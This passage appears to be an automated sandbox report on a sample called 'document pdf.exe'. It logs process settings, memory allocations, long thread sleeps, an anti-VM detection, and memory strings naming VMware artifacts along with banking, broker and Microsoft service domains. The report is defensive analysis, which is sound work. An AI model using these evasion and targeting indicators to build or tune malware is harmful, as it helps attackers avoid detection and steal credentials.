                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: document pdf.exe PID: 3420, type: MEMORYSTR
                Source: C:\Users\user\Desktop\document pdf.exeMemory allocated: 2FA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeMemory allocated: 31B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeMemory allocated: 2FA0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeMemory allocated: 8160000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeMemory allocated: 9160000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeMemory allocated: 9310000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeMemory allocated: A310000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeMemory allocated: F10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeMemory allocated: 2A70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeMemory allocated: 2840000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 599641Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 599531Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 599422Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 599312Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 599203Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 598984Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 598875Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 598766Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 598641Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 598526Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 598406Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 598297Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 598172Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 598063Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 597938Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 597828Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 597719Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 597594Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 597484Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 597375Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 597266Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 597156Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 597047Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 596937Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 596821Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 596703Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 596593Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 596484Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 596375Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 596266Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 596156Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 596047Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 595937Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 595828Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 595719Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 595609Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 595499Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 595391Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 595281Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 595172Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 595063Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 594938Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 594813Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 594688Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 594578Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 594467Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeWindow / User API: threadDelayed 1573Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeWindow / User API: threadDelayed 8276Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep count: 35 > 30Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -599875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4976Thread sleep count: 1573 > 30Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4976Thread sleep count: 8276 > 30Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -599766s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -599641s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -599531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -599422s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -599312s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -599203s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -599094s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -598984s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -598875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -598766s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -598641s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -598526s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -598406s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -598297s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -598172s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -598063s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -597938s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -597828s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -597719s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -597594s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -597484s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -597375s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -597266s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -597156s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -597047s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -596937s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -596821s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -596703s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -596593s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -596484s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -596375s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -596266s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -596156s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -596047s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -595937s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -595828s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -595719s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -595609s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -595499s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -595391s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -595281s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -595172s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -595063s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -594938s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -594813s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -594688s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -594578s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exe TID: 4236Thread sleep time: -594467s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 599641Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 599531Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 599422Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 599312Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 599203Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 598984Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 598875Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 598766Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 598641Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 598526Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 598406Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 598297Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 598172Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 598063Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 597938Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 597828Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 597719Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 597594Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 597484Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 597375Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 597266Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 597156Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 597047Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 596937Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 596821Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 596703Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 596593Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 596484Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 596375Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 596266Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 596156Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 596047Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 595937Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 595828Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 595719Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 595609Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 595499Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 595391Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 595281Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 595172Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 595063Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 594938Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 594813Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 594688Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 594578Jump to behavior
                Source: C:\Users\user\Desktop\document pdf.exeThread delayed: delay time: 594467Jump to behavior
                Source: Amcache.hve.6.drBinary or memory string: VMware
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
                Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
                Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                Source: document pdf.exe, 00000003.00000002.4667808438.0000000003D31000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
                Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.6.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
